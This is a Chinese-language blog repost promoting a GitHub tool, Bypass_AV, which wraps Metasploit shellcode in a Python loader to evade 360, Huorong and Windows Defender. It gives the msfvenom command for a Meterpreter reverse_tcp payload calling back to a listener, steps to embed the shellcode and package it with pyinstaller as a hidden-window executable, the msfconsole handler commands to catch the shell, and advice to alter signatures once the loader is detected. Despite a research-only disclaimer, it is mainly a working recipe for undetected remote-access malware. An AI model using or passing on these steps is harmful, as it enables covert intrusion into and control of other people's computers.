免殺ShellCode加載器 ,360、火絨、Windows Defender
VSole2022-08-29 06:37:55
Bypass_AV msf免殺,ShellCode免殺加載器 ,免殺shellcode執行程序 ,360&火絨&Windows Defender
代碼夠簡單,估計要不了多久就進特征庫了,被殺了再去改幾個特征碼照樣又可以免殺,作者的github保持更新,可以去瞅瞅。
項目地址:https://github.com/Axx8/Bypass_AV
環境
2022年5月8日 測試可以免殺國內殺軟 火絨&360及Windows Defender Windows 10 64位 360&火絨&Windows Defender Windows 7 64位 或以上操作系統應該都沒問題(沒有測試)
該項目僅供網絡安全研究使用,禁止使用該項目進行違法操作,否則自行承擔后果,請各位遵守《中華人民共和國網絡安全法》!!!
代碼未經過大量測試,如發現問題請提交 issue。
使用msfvenom
生成ShellCode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c
注意:ShellCode 需要是64位的

加載器
將生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 處
注意:保留原始ShellCode 里的雙引號 "
示例:

最終格式:

打包成可執行程序
編譯
Python 3.8.6
pyinstaller 4.7
pip install pyinstaller pyinstaller -F -w Bypss_AV.py
生成Bypass_AV.exe在dist目錄中
運行監聽
msfconsole msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 0.0.0.0 msf6 exploit(multi/handler) > set lport 8080 msf6 exploit(multi/handler) > run
Bypass_360視頻
https://user-images.githubusercontent.com/34683107/167286823-a93fdd69-547e-4adc-9ae5-171fb0e919ca.mov
Bypass_火絨視頻
https://user-images.githubusercontent.com/34683107/167286897-a482c486-c3e9-4f69-ae55-98afd2ff1ed7.mov
Bypass_Windows Defender視頻
https://user-images.githubusercontent.com/34683107/167286874-9413611e-c2be-4cfb-ba51-f95ebe5518af.mov
VSole
網絡安全專家